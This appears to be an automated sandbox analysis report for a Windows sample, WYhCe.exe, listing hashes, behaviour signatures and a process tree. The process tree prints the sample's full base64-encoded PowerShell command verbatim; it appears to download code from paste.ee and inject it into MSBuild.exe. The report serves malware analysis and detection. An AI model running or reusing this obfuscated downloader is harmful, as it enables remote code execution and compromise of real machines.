e10c07621cbf12d95bfcb870835c10bbda376fd9e17e49f5caca6b3a3d239bdb

General

Target

WYhCe.exe
Size

103KB
MD5

c2337bf726d285b3e59ef7f26f388bca
SHA1

5b2bfc673012d02f27299db6929a144fd2517f93
SHA256

e10c07621cbf12d95bfcb870835c10bbda376fd9e17e49f5caca6b3a3d239bdb
SHA512

27e9e92d12658dd6a6e1e710577ea94d8523d3a6f703646007d8d001db9a2b608d314d9e727063207699db9717ed0e2bb77c2a19bae3e79542bec9389c5d2ba1

Score

3^/10

Malware Config

Signatures

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2680	1980	WerFault.exe	70

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeRestorePrivilege	2680	WerFault.exe
Token: SeBackupPrivilege	2680	WerFault.exe
Token: SeDebugPrivilege	2680	WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe
2680	WerFault.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 1844	1612	WYhCe.exe	69
PID 1612 wrote to memory of 1844	1612	WYhCe.exe	69
PID 1612 wrote to memory of 1844	1612	WYhCe.exe	69
PID 1844 wrote to memory of 1980	1844	cmd.exe	70
PID 1844 wrote to memory of 1980	1844	cmd.exe	70
PID 1844 wrote to memory of 1980	1844	cmd.exe	70

C:\Users\Admin\AppData\Local\Temp\WYhCe.exe
"C:\Users\Admin\AppData\Local\Temp\WYhCe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JABIAFAAdgBhAGQASQAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHUAQgBKADEAZgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAEsAcQBNAFkAUQBDAGUAZABMAGgAcwBDAFkARwBpAHMAVgBvAGEATQBYAFAAdwBLAFUAYwBTAHcAdAB6AHgAUQBEAGMAbQBVAG4AaQBYAEEASQB5AG8AdABMAGEAWQBkAGkATgBuAFoAUABUAFUAZQBOAGcATgB0AHQAdwBqAHMAWgBTAHQAbABnAFEAQQBGAGcAbQBhAEcAUQBWAHEAZwBEAFcAWgB5AFgAUQBEAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABpAFMANgBpACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqACkA
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JABIAFAAdgBhAGQASQAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHUAQgBKADEAZgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAEsAcQBNAFkAUQBDAGUAZABMAGgAcwBDAFkARwBpAHMAVgBvAGEATQBYAFAAdwBLAFUAYwBTAHcAdAB6AHgAUQBEAGMAbQBVAG4AaQBYAEEASQB5AG8AdABMAGEAWQBkAGkATgBuAFoAUABUAFUAZQBOAGcATgB0AHQAdwBqAHMAWgBTAHQAbABnAFEAQQBGAGcAbQBhAEcAUQBWAHEAZwBEAFcAWgB5AFgAUQBEAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABpAFMANgBpACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqACkA
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 716
      4⤵
      Program crash
      Suspicious use of AdjustPrivilegeToken
      Suspicious behavior: EnumeratesProcesses
      PID:2680

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2680-3-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

Filesize
4KB

Download
memory/2680-10-0x0000000005200000-0x0000000005201000-memory.dmp

Filesize
4KB

Download
memory/2680-11-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads